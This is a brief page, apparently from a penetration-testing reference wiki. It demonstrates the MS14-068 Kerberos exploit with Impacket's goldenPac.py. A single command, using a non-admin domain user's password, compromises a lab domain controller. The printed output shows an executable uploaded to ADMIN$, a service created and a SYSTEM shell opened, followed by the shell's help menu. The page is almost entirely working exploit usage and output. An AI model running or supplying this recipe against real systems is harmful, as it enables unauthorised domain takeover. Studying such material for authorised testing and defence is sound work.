Ms14 068

/impacket/examples [git:master]$ python goldenPac.py -dc-ip 172.16.102.15 -target-ip 172.16.102.15 exploit.local/notanadmin:ASDqwe123@dc1
Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] User SID: S-1-5-21-3211488530-130973289-431960246-1104
[-] Couldn't get forest info ([Errno Connection error (exploit.local:445)] [Errno 8] nodename nor servname provided, or not known), continuing
[*] Attacking domain controller 172.16.102.15
[*] 172.16.102.15 found vulnerable!
[*] Requesting shares on 172.16.102.15.....
[*] Found writable share ADMIN$
[*] Uploading file tXLpAWiu.exe
[*] Opening SVCManager on 172.16.102.15.....
[*] Creating service TKWq on 172.16.102.15.....
[*] Starting service TKWq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>help

 lcd {path}                 - changes the current local directory to {path}
 exit                       - terminates the server process (and this session)
 put {src_file, dst_path}   - uploads a local file to the dst_path RELATIVE to the connected share (ADMIN$)
 get {file}                 - downloads pathname RELATIVE to the connected share (ADMIN$) to the current local dir
 ! {cmd}                    - executes a local shell cmd


C:\Windows\system32>
Want to contribute? Get in touch!
Last updated on 5th Jul 2017